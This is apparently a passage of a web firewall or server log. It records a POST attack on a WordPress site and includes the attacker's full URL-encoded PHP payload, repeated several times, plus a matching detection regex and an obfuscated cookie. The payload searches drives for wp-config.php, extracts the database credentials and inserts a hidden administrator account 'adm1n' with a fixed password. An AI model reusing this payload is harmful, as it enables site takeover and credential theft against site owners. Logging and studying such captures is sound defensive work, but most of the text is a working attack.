%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));"]
["2026-05-16 00:08:14","213.209.159.254","POST","\/","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.3 Safari\/605.1.15","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> fC:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/ HTTP\/1.1\ncontent-type:application\/x-www-form-urlencoded\ncookie:4=0a64bb21b33726046f335a7dc8ae049c; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvMxZvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzyvLKAyK3Owo25hMJA0nJ9hVwgcMvuznJkyK3O1qS9wo250MJ50pltxpPjxLlxcr2yhL2k1MTHtWUN7DUIhoTyhnltxpPx7MKucqQg9sK1xnJHbVvSho3E3paEvoPRvXGf=; 1=53; 0=71\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.3 Safari\/605.1.15\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\ncontent-length:12640\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\n\nfC=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
